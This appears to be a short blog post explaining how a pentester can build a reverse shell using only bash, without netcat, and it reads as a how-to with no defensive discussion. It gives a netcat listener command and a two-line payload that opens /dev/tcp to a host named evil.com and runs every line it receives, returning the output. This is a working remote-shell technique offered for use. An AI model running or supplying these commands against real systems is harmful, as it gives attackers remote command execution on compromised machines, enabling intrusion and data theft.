Reverse Shell with Bash

http://www.google.cn/search?hl=zh-CN&source=hp&q=http%3A%2F%2Flabs.neohapsis.com%2F2008%2F04%2F17%2Fconnect-back-shell-literally%2F&btnG=Google+%E6%90%9C%E7%B4%A2&aq=f&oq=

I am stuck at the Dubai International Airport and I have nothing else interesting to do. So, I though I might share a simple technique which will go into the Agile Hacking project. Here I will show you how to create a reverse command shell without using 3rd-party tools such as the all mighty netcat. Please read on!

When the pentester compromises a machine they often need to provide themselves with a user friendly access to the system. This is where command shells come into place. It is worth noting that there are a couple of variants of command shells. The typical shell consists of a generic network client, typically netcat, listening on a remote port which pipes output into something like bash. Another type of shell, which is known to be suitable when the pentester is restricted in terms of network service connectivity/availability, is the reverse shell which consists of a generic network client, again something like netcat, connecting to the attacker’s machine and piping input to bash. Most of the time, the attacker will use netcat, because this is the tool that is suggested in most security references and books.

Although netcat is quite useful, and you may have to use it in most cases, here is a simple technique which emulates what exactly netcat does but it relies on bash only. Let’s see how.

• In step one we start a listening service on our box. We can use netcat, or whatever you might have in hand.

  $ nc -l -p 8080 -vvv

• On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.

  $ exec 5<>/dev/tcp/evil.com/8080
  $ cat <&5 | while read line; do $line 2>&5 >&5; done

There you go. Now everything we type in our local listening server will get executed on the target and the output of the commands will be piped back. Keep in mind that we don’t use any 3rd-party tools on the target but its default shell. This technique comes extremely handy in many situations and it leaves very small footprint on the targeted system.